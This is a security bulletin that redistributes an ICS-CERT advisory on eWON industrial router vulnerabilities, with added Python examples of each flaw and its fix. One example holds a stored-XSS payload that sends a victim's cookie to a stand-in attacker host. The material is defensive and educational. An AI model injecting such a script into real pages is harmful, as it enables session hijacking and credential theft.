-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2015.3211
                           eWON Vulnerabilities
                             23 December 2015

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           eWON routers
Publisher:         ICS-CERT
Operating System:  Network Appliance
Impact/Access:     Cross-site Request Forgery -- Remote with User Interaction
                   Cross-site Scripting       -- Remote with User Interaction
                   Access Confidential Data   -- Remote/Unauthenticated      
                   Unauthorised Access        -- Remote/Unauthenticated      
Resolution:        Patch/Upgrade
CVE Names:         CVE-2015-7929 CVE-2015-7928 CVE-2015-7927
                   CVE-2015-7926 CVE-2015-7925 CVE-2015-7924

Original Bulletin: 
   https://ics-cert.us-cert.gov/advisories/ICSA-15-351-03

- --------------------------BEGIN INCLUDED TEXT--------------------

Advisory (ICSA-15-351-03)

eWON Vulnerabilities

Original release date: December 17, 2015

Legal Notice

All information products included in http://ics-cert.us-cert.gov are provided
"as is" for informational purposes only. The Department of Homeland Security
(DHS) does not provide any warranties of any kind regarding any information
contained within. DHS does not endorse any commercial product or service,
referenced in this product or otherwise. Further dissemination of this
product is governed by the Traffic Light Protocol (TLP) marking in the
header. For more information about TLP, see http://www.us-cert.gov/tlp/.

OVERVIEW

Independent researcher Karn Ganeshen has identified several vulnerabilities
in the eWON sa industrial router. eWON sa has produced an updated firmware
to mitigate these vulnerabilities.

These vulnerabilities could be exploited remotely.

AFFECTED PRODUCTS

The following eWON router firmware versions are affected:

    eWON firmware versions prior to 10.1s0

IMPACT

Vulnerabilities between the application server and client browsers
can impact the integrity of what the server is presenting, allow for
information leakage, and allow for unauthorized and unauthenticated use
of the application server.

A session is an established association between a web server or application
and a user's browser. Sessions let the application retain state between
requests and are normally identified by a token that the browser holds and
sends with each request. One of the vulnerabilities is in the eWON log-off
function: pressing the button does not terminate the session on the server,
so the existing session token remains valid and a malicious party with access
to the same browser session can continue interacting with the device.

Cross-site scripting (XSS) occurs when a web server embeds untrusted input in
dynamically generated pages without neutralising it. An attacker can then post
content that, when viewed by other users, executes arbitrary HTML and active
content, such as JavaScript, ActiveX, and VBScript, in the victim's browser
within the context of the client-server session. This potentially allows the
attacker to redirect the web page to a malicious location, hijack the
client-server session, engage in network reconnaissance, and plant backdoor
programs. Please refer to the ICS-CERT Abstract on Cross-Site Scripting for
more information and additional mitigations.

A cross-site request forgery (CSRF) attack causes the victim's web browser to
perform an unwanted action on a trusted site for which the user is currently
authenticated. The eWON web server application does not use CSRF tokens
anywhere and therefore allows any application function to be executed
silently from a page the attacker controls while the victim is logged in.

The server allows direct entry and manipulation of the URL, so an
unauthenticated user can gather information and the status of I/O servers
simply by requesting a forged URL.

The server does not encrypt sensitive data such as passwords. They are passed
in plain text, allowing a malicious party to retrieve them from network
traffic. The autocomplete setting of some eWON forms also allows these
passwords to be retrieved from the browser. Compromise of the credentials
would allow unauthorised access to the device.

The eWON firmware web server accepts the HTTP method GET in place of POST.
GET is less secure for sensitive data because the data sent are part of the
URL, where they are recorded in browser history, proxy and server logs, and
Referer headers.

Impact to individual organizations depends on many factors that are unique
to each organization. NCCIC/ICS-CERT recommends that organizations evaluate
the impact of these vulnerabilities based on their operational environment,
architecture, and product implementation.

BACKGROUND

eWON sa is a Belgium-based company that maintains offices in several
countries around the world, including the United States and Japan.

The affected product, eWON, is an industrial router. According to eWON
sa, eWON routers are deployed across several sectors including Commercial
Facilities, Critical Manufacturing, Energy, Water and Wastewater Systems,
and others.

VULNERABILITY CHARACTERIZATION

VULNERABILITY OVERVIEW

WEAK SESSION MANAGEMENT[a]

The software function to log off retains the session within the browser
allowing a malicious party to use the same browser session to continue
interacting with the device.

CVE-2015-7924[b] has been assigned to this vulnerability. A CVSS v3 base
score of 8.8 and a temporal score of 7.9 have been assigned; the CVSS
vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C).[c]
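The behaviour described above, and the server-side fix for it, as an added
example that is not part of the original advisory or of eWON's firmware. The
in-memory session store, the 15-minute idle timeout and the user name are
assumptions made for the illustration; the point is the difference between a
log-off that only tells the browser to drop its cookie and one that also
destroys the session record on the server.

```python
"""Session lifecycle model: what "log off" must do on the server.

Illustrative code only (not eWON firmware). Two logout implementations are
compared: one that merely tells the browser to drop its cookie, and one that
also invalidates the session record server-side.
"""
import secrets
import time

SESSION_TTL_SECONDS = 15 * 60  # assumed idle timeout for this example


class SessionStore:
    """In-memory server-side session table keyed by an unguessable ID."""

    def __init__(self):
        self._sessions = {}  # session_id -> {"user": str, "last_seen": float}

    def login(self, user, now=None):
        session_id = secrets.token_urlsafe(32)   # 256 bits of entropy
        self._sessions[session_id] = {
            "user": user,
            "last_seen": time.time() if now is None else now,
        }
        return session_id

    def authenticated_user(self, session_id, now=None):
        """Return the user bound to session_id, or None if it is not valid."""
        record = self._sessions.get(session_id)
        if record is None:
            return None
        now = time.time() if now is None else now
        if now - record["last_seen"] > SESSION_TTL_SECONDS:
            del self._sessions[session_id]   # idle timeout: expire lazily
            return None
        record["last_seen"] = now
        return record["user"]

    def logout_vulnerable(self, session_id):
        """Logout as the advisory describes it: the browser is told to drop
        its cookie, but the server keeps the session record, so any copy of
        the session ID (left in a shared browser, captured on the wire, or
        cached by a proxy) still authenticates."""
        return {"Set-Cookie": "session=; Max-Age=0"}

    def logout_fixed(self, session_id):
        """Logout that terminates the session: the server forgets the ID, so
        later use of it is rejected whatever the client does with its cookie."""
        self._sessions.pop(session_id, None)
        return {"Set-Cookie": "session=; Max-Age=0"}


def replay_after_logout(logout):
    """Pentest-style check: log in, log out through `logout`, then replay the
    old session ID. Returns True if the replay is still authenticated (bad)."""
    store = SessionStore()
    sid = store.login("adm")
    if store.authenticated_user(sid) != "adm":
        raise RuntimeError("login did not establish a session")
    logout(store, sid)   # whether the browser honours Set-Cookie is irrelevant
    return store.authenticated_user(sid) is not None


if __name__ == "__main__":
    print("vulnerable logout, old ID still valid:",
          replay_after_logout(SessionStore.logout_vulnerable))
    print("fixed logout, old ID still valid:     ",
          replay_after_logout(SessionStore.logout_fixed))
```

replay_after_logout is the check a tester performs against a real device:
capture the session cookie, press log off, then resend an authenticated
request carrying the captured cookie. If the device still answers as the
logged-in user, CWE-613 applies regardless of what the browser did with its
cookie.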

CROSS-SITE REQUEST FORGERY ATTACKS[d]

Cross-site request forgery is an attack in which the victim's browser is
induced to pass malicious commands from the user to the application server.
The eWON web application contains a global CSRF vulnerability: there is no
anti-CSRF token in use, either per page or per (configuration) function. An
attacker can perform actions with the same permissions as the victim user,
provided the victim has an active session and is induced to trigger the
malicious request.

Successful exploitation may allow the execution of firmware upload, device
reboot, or deletion of device configuration.

CVE-2015-7925[e] has been assigned to this vulnerability. A CVSS v3 base
score of 8.0 and a temporal score of 7.6 have been assigned; the CVSS
vector string is (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C).[f]
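How a synchronizer token closes this hole, shown as an added example
(illustrative code, not eWON's implementation). The endpoint names /reboot,
/upload_firmware and /delete_config stand in for the actions named above and
are assumptions, as is the in-memory Session object. The same handler refuses
to perform a state change on a GET, which is the other half of making forged
requests fail.

```python
"""Synchronizer-token CSRF defence for state-changing device actions.

Illustrative code only, not eWON's implementation. Endpoint names are
assumed. A state-changing action is accepted only when (1) it arrives by
POST and (2) it carries a token matching the one issued to the requesting
session.
"""
import hmac
import secrets

# Assumed paths standing in for firmware upload, reboot and config deletion.
STATE_CHANGING = {"/reboot", "/upload_firmware", "/delete_config"}


class Session:
    def __init__(self, user):
        self.user = user
        # One unguessable token per session, generated server-side and
        # never derivable from the session cookie alone.
        self.csrf_token = secrets.token_urlsafe(32)


def render_form(session, action):
    """What the server embeds in its own pages: the token travels in the
    page body, which a cross-origin attacker page cannot read."""
    return {"action": action, "method": "POST",
            "hidden": {"csrf_token": session.csrf_token}}


def handle(session, method, path, form):
    """Dispatch one request. Returns (status, message)."""
    if path in STATE_CHANGING:
        if method != "POST":
            # GET must never change state: it is trivially forged with an
            # <img src=...> and also lands in proxy logs and browser history.
            return 405, "method not allowed"
        supplied = form.get("csrf_token", "")
        # Constant-time comparison: do not leak token bytes through timing.
        if not hmac.compare_digest(supplied.encode(), session.csrf_token.encode()):
            return 403, "missing or invalid CSRF token"
    return 200, f"{path} executed for {session.user}"


def run_scenarios():
    """Legitimate vs forged requests against a victim with a live session.
    Returns a dict of scenario name -> HTTP status."""
    victim = Session("adm")
    attacker = Session("guest")   # the attacker's own, separate session
    legit_form = render_form(victim, "/reboot")["hidden"]
    return {
        # Victim submits the server-rendered form: accepted.
        "legitimate_post": handle(victim, "POST", "/reboot", legit_form)[0],
        # Attacker page loads <img src="/reboot">: the browser attaches the
        # victim's cookie, but the request is a GET -> rejected.
        "forged_get": handle(victim, "GET", "/reboot", {})[0],
        # Attacker page auto-submits a hidden POST form: the cookie goes
        # along, but the attacker cannot read the victim's token -> rejected.
        "forged_post_no_token": handle(victim, "POST", "/reboot", {})[0],
        # Attacker reuses a token from his own login: bound to the wrong
        # session -> rejected.
        "forged_post_attacker_token": handle(
            victim, "POST", "/reboot", {"csrf_token": attacker.csrf_token})[0],
        # Read-only page with no side effects needs no token.
        "status_get": handle(victim, "GET", "/status", {})[0],
    }


if __name__ == "__main__":
    for name, status in run_scenarios().items():
        print(f"{name:28s} -> HTTP {status}")
```

The token is bound to the session, so a token the attacker obtains from his
own login is useless against the victim's, and it is delivered in the page
body rather than in a cookie, which is precisely what a cross-origin page
cannot read. Setting the session cookie with the SameSite attribute adds an
independent layer in browsers that support it, but it is not a substitute
for the token.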

WEAK RBAC CONTROLS[g]

The software allows an unauthenticated user to gather information and
status of I/O servers through the use of a forged URL.

CVE-2015-7926[h] has been assigned to this vulnerability. A CVSS v3 base
score of 9.9 and a temporal score of 8.9 have been assigned; the CVSS
vector string is (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C).[i]
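A default-deny dispatcher of the kind that prevents this, as an added example
(illustrative code, not eWON's). The route names, the role names and the
session dictionary are assumptions; the I/O server status page is modelled as
/io_status. The check runs on every request, on the canonical path, so that a
URL typed directly, a link the UI never shows, and a path containing ../
segments all receive the same decision.

```python
"""Default-deny authorization for every URL, including "unlinked" ones.

Illustrative code only, not eWON's implementation; route and role names are
assumed. Authorization is decided on the server for every request against an
explicit table, rather than by the UI not showing a link.
"""
from urllib.parse import urlsplit

# Path -> minimum role required. Anything not listed is denied outright.
ROUTES = {
    "/login":           None,       # public
    "/io_status":       "viewer",   # assumed name for the I/O server status page
    "/config":          "admin",
    "/upload_firmware": "admin",
}
ROLE_RANK = {"viewer": 1, "operator": 2, "admin": 3}


def normalize(path):
    """Resolve /./io_status or /x/../io_status to the canonical path so the
    table is matched on what the server would actually serve; the query
    string plays no part in the authorization decision."""
    parts = []
    for seg in urlsplit(path).path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            continue
        parts.append(seg)
    return "/" + "/".join(parts)


def authorize(path, session):
    """Return (status, reason). `session` is None for unauthenticated callers,
    otherwise a dict carrying the caller's 'role'."""
    canonical = normalize(path)
    if canonical not in ROUTES:
        return 404, "unknown path"
    required = ROUTES[canonical]
    if required is None:
        return 200, "public"
    if session is None:
        return 401, "authentication required"
    if ROLE_RANK.get(session.get("role"), 0) < ROLE_RANK[required]:
        return 403, "insufficient role"
    return 200, "ok"


if __name__ == "__main__":
    # Constructed probes: the forged-URL case is the unauthenticated one.
    for req_path, sess in [("/io_status", None),
                           ("/x/../io_status?server=modbus", None),
                           ("/io_status", {"role": "viewer"}),
                           ("/config", {"role": "viewer"}),
                           ("/config", {"role": "admin"})]:
        print(f"{req_path:32s} {str(sess):20s} -> {authorize(req_path, sess)}")
```

Unknown paths get 404 for everyone here. If path enumeration by
unauthenticated callers is a concern, answer 401 to every non-public path
before consulting the route table, so that existence is never revealed
without a session.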

STORED CROSS-SITE SCRIPTING[j]

Stored cross-site scripting is client-side code injection in which an
attacker stores malicious script on a web server or application, typically
through an input field whose value is persisted. The script is then served
to other users of the web server or application and executes in their
browsers, making them the victims.

CVE-2015-7927[k] has been assigned to this vulnerability. A CVSS v3 base
score of 6.1 and a temporal score of 5.8 have been assigned; the CVSS
vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RL:U/RC:C).[l]
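The vulnerable and the corrected output path side by side, as an added
example not taken from eWON's firmware. The stored field, the payload and the
table markup are constructed for the illustration; parsed_tags feeds each
rendering to Python's HTML parser as a stand-in for what a browser would
execute.

```python
"""Stored XSS: raw interpolation vs contextual output encoding.

Illustrative code only, not eWON's implementation. The 'name' field is an
assumed example of user-controlled content that is stored and later shown to
other users.
"""
import html
from html.parser import HTMLParser

# Constructed payload: what an attacker submits through the stored field.
PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'

STORE = {}   # field -> stored value, as the device would persist it


def save(field, value):
    STORE[field] = value     # store raw; encoding is an output-time decision


def render_vulnerable(field):
    # Untrusted data dropped into the page verbatim: every later visitor's
    # browser runs it in the device's origin, with that visitor's session.
    return f"<td>{STORE[field]}</td>"


def render_fixed(field):
    # HTML element context: '<', '>', '&', '"' and "'" become entities, so
    # the stored markup is displayed as text rather than parsed as tags.
    return f"<td>{html.escape(STORE[field], quote=True)}</td>"


def render_attr_fixed(field):
    # Quoted attribute context: the same encoder suffices only because the
    # value is inside quotes; an unquoted attribute would still break out on
    # a space, and a JavaScript or URL context needs its own encoder.
    return f'<input name="device" value="{html.escape(STORE[field], quote=True)}">'


class TagCollector(HTMLParser):
    """Records the start tags an HTML parser sees: a stand-in for what a
    browser would actually interpret as markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def parsed_tags(page):
    collector = TagCollector()
    collector.feed(page)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    save("name", PAYLOAD)
    print("vulnerable:", parsed_tags(render_vulnerable("name")))   # script tag survives
    print("fixed:     ", parsed_tags(render_fixed("name")))        # only the td
    print("attribute: ", parsed_tags(render_attr_fixed("name")))   # only the input
```

Encoding happens when the value is written into the page, not when it is
stored, and the encoder must match the context: html.escape is right for
element content and quoted attributes, but a value inserted into a JavaScript
string or a URL needs a different encoder. Input validation and length limits
on stored fields are worthwhile, but they do not replace output encoding.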

PASSWORDS NOT SECURED[m]

Passwords are passed in plain text, allowing a malicious party to retrieve
them from network traffic. The autocomplete setting of some eWON forms also
allows these passwords to be retrieved from the browser. Compromise of the
credentials would allow unauthorised access to the device.

CVE-2015-7928[n] has been assigned to this vulnerability. A CVSS v3 base
score of 9.3 and a temporal score of 8.8 have been assigned; the CVSS
vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N/E:P/RL:U/RC:C).[o]

POST/GET ISSUES[p]

The eWON firmware web server accepts the HTTP method GET in place of POST.
GET is less secure for sensitive data because the data sent are part of the
URL, where they are recorded in browser history, proxy and server logs, and
Referer headers.

CVE-2015-7929[q] has been assigned to this vulnerability. A CVSS v3 base
score of 4.3 and a temporal score of 4.1 have been assigned; the CVSS
vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:U/RC:C).[r]
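A scanner that flags both findings above, credentials over plain HTTP
(Passwords Not Secured) and credentials in a GET query string (POST/GET
Issues), in captured requests. This is an added example, not part of the
advisory, and makes no claim about eWON's actual form or parameter names. The
sample requests, the parameter names and the host 192.0.2.10 are constructed
for the illustration; real input would come from a proxy log or a pcap
decoded with tshark.

```python
"""Scan captured HTTP requests for credentials sent insecurely.

Illustrative code only, not eWON's implementation. Two findings are raised:
  CLEARTEXT    - a credential-bearing parameter travels over plain http://
  QUERY_STRING - a credential-bearing parameter is in the URL of a GET, so
                 it also lands in browser history, Referer headers and logs.
"""
from urllib.parse import parse_qs, urlsplit

SENSITIVE_PARAMS = {"password", "passwd", "pwd", "pass", "secret", "token"}

# Constructed sample: (method, url, body) as a proxy would record them.
SAMPLE_REQUESTS = [
    ("GET",  "http://192.0.2.10/login?user=adm&password=adm", ""),
    ("POST", "http://192.0.2.10/login", "user=adm&password=adm"),
    ("POST", "https://192.0.2.10/login", "user=adm&password=adm"),
    ("GET",  "https://192.0.2.10/io_status?server=modbus", ""),
]


def params_in(query_or_body):
    """Lower-cased parameter names present in a query string or form body."""
    return {k.lower() for k in parse_qs(query_or_body, keep_blank_values=True)}


def scan(requests):
    """Return a list of (finding, method, path, param) tuples, one per
    sensitive parameter per finding type."""
    findings = []
    for method, url, body in requests:
        parts = urlsplit(url)
        in_query = params_in(parts.query) & SENSITIVE_PARAMS
        in_body = params_in(body) & SENSITIVE_PARAMS
        for p in sorted(in_query):
            findings.append(("QUERY_STRING", method, parts.path, p))
        if parts.scheme == "http":
            for p in sorted(in_query | in_body):
                findings.append(("CLEARTEXT", method, parts.path, p))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print("%-12s %-4s %-12s %s" % finding)
```

The autocomplete issue has no wire-level signature; it is checked by
inspecting the login form's markup for autocomplete="off" on the password
field, with the caveat that current browsers' password managers ignore that
attribute, so the effective remedies are serving the form over TLS and never
echoing or pre-filling a stored credential into the page.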

VULNERABILITY DETAILS

EXPLOITABILITY

These vulnerabilities could be exploited remotely.

EXISTENCE OF EXPLOIT

No known public exploits specifically target these vulnerabilities.

DIFFICULTY

An attacker with a low skill level would be able to exploit these
vulnerabilities.

MITIGATION

eWON sa has mitigated some of the aforementioned vulnerabilities (Weak
Session Management, Weak RBAC Controls, and partially Passwords Not Secured)
with its updated firmware. For the vulnerabilities not mitigated by firmware
updates, eWON sa recommends using the router in a secure environment. More
information on eWON's mitigation of these vulnerabilities can be found on
their web site at:

http://ewon.biz/support/news/support/ewon-security-enhancement-7529-01

The newest version of their firmware may be found at:

http://ewon.biz/support/product/download-firmware/firmware-2

ICS-CERT recommends that users take defensive measures to minimize the
risk of exploitation of these vulnerabilities. Specifically, users should:

    Minimize network exposure for all control system devices and/or systems,
    and ensure that they are not accessible from the Internet.
    Locate control system networks and remote devices behind firewalls,
    and isolate them from the business network.
    When remote access is required, use secure methods, such as Virtual
    Private Networks (VPNs), recognizing that VPNs may have vulnerabilities
    and should be updated to the most current version available. Also
    recognize that VPN is only as secure as the connected devices.

ICS-CERT reminds organizations to perform proper impact analysis and risk
assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems
security recommended practices on the ICS-CERT web page at:
http://ics-cert.us-cert.gov/content/recommended-practices. Several
recommended practices are available for reading and download, including
Improving Industrial Control Systems Cybersecurity with Defense-in-Depth
Strategies.

Additional mitigation guidance and recommended practices are
publicly available in the ICS-CERT Technical Information Paper,
ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation
Strategies, that is available for download from the ICS-CERT web site
(http://ics-cert.us-cert.gov/).

Organizations observing any suspected malicious activity should follow their
established internal procedures and report their findings to ICS-CERT for
tracking and correlation against other incidents.

    a. CWE-613: Insufficient Session Expiration,
       http://cwe.mitre.org/data/definitions/613.html, web site last accessed
       December 17, 2015.
    b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7924,
       NIST uses this advisory to create the CVE web site report. This web
       site will be active sometime after publication of this advisory.
    c. CVSS Calculator,
       https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S...
       , web site last accessed December 15, 2015.
    d. CWE-352: Cross-Site Request Forgery (CSRF),
       http://cwe.mitre.org/data/definitions/352.html, web site last accessed
       December 17, 2015.
    e. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7925,
       NIST uses this advisory to create the CVE web site report. This web
       site will be active sometime after publication of this advisory.
    f. CVSS Calculator,
       https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S...
       , web site last accessed December 17, 2015.
    g. CWE-274: Improper Handling of Insufficient Privileges,
       http://cwe.mitre.org/data/definitions/274.html, web site last accessed
       December 17, 2015.
    h. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7926,
       NIST uses this advisory to create the CVE web site report. This web
       site will be active sometime after publication of this advisory.
    i. CVSS Calculator,
       https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S...
       , web site last accessed December 17, 2015.
    j. CWE-79: Improper Neutralization of Input During Web Page Generation
       (Cross-site Scripting), http://cwe.mitre.org/data/definitions/79.html,
       web site last accessed December 17, 2015.
    k. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7927,
       NIST uses this advisory to create the CVE web site report. This web
       site will be active sometime after publication of this advisory.
    l. CVSS Calculator,
       https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S...
       , web site last accessed December 17, 2015.
    m. CWE-255: Credentials Management,
       http://cwe.mitre.org/data/definitions/255.html, web site last accessed
       December 17, 2015.
    n. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7928,
       NIST uses this advisory to create the CVE web site report. This web
       site will be active sometime after publication of this advisory.
    o. CVSS Calculator,
       https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S...
       , web site last accessed December 17, 2015.
    p. CWE-598: Information Exposure Through Query Strings in GET Request,
       http://cwe.mitre.org/data/definitions/598.html, web site last accessed
       December 17, 2015.
    q. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7929,
       NIST uses this advisory to create the CVE web site report. This web
       site will be active sometime after publication of this advisory.
    r. CVSS Calculator,
       https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S...
       , web site last accessed December 17, 2015.

Contact Information

For any questions related to this report, please contact ICS-CERT at:

Email: ics-cert@hq.dhs.gov
Toll Free: 1-877-776-7585
International Callers: (208) 526-0900

For industrial control systems security information and incident reporting:
http://ics-cert.us-cert.gov

ICS-CERT continuously strives to improve its products and services. You
can help by choosing one of the links below to provide feedback about
this product.

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
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=1rqu
-----END PGP SIGNATURE-----